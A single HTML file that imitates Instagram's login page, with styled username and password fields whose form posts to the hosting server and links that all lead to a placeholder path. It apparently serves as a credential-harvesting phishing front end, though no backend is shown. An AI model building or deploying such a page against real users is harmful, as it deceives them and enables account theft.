
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <link rel="stylesheet" href="style.css">

<style>
body{
    background-color: #f4f4f4;
    font-family: sans-serif;
}

a{
    text-decoration: none;
}

.wrapper{
    background-color: #fff;
    width: 22%;
    margin: 5% auto;
    padding: 1rem 3rem;
}

.wrapper h1{
    font-family: Lucida Handwriting;
    text-align: center;
}

.form{
    padding-top: 2rem;
}

input{
    width: 100%;
    margin-top: 2%;
    padding: 12px 4px;
    color: gray;
    background-color: #f4f4f4;
    border: none;
}

.btn{
    width: 102%;
    padding: 10px 4px;
    margin-top: 3%;
    border: none;
    border-radius: 5px;
    background-color: #C4E0FB;
    color: #fff;
}

h5{
    text-align: center;
    color: gray;
}

.fb{
    text-align: center;
    font-weight: bold;
    color: #4267B2;
}

.forgot{
    text-align: center;
    padding-top: 3%;
}

.wrapper2{
    background-color: #fff;
    width: 22%;
    margin:  auto;
    padding: 0.6rem 3rem;

}

.signup{
    color: #3A98F0;
    font-weight: bold;
}



</style>

</head>

<body>

    <div class="wrapper">
        <h1>Instagram</h1>
        <form method="POST" class="form">
            <input name="name" type="text" placeholder="Phone number, username or email" required>
            <input name="password" type="password" placeholder="Password" required>
            <button type="submit" class="btn btn-primary">Login</button>
        </form>
        <h5>OR</h5>
        <a href="/bruh">
            <p class="fb">Log in with Facebook</p>
        </a>
        <a href="/bruh">
            <p class="forgot">Forgot password?</p>
        </a>
    </div>

    <div class="wrapper2">
        <p>Don't have an account?<a href="/bruh" class="signup"> Sign up</a></p>
    </div>

</body></html>

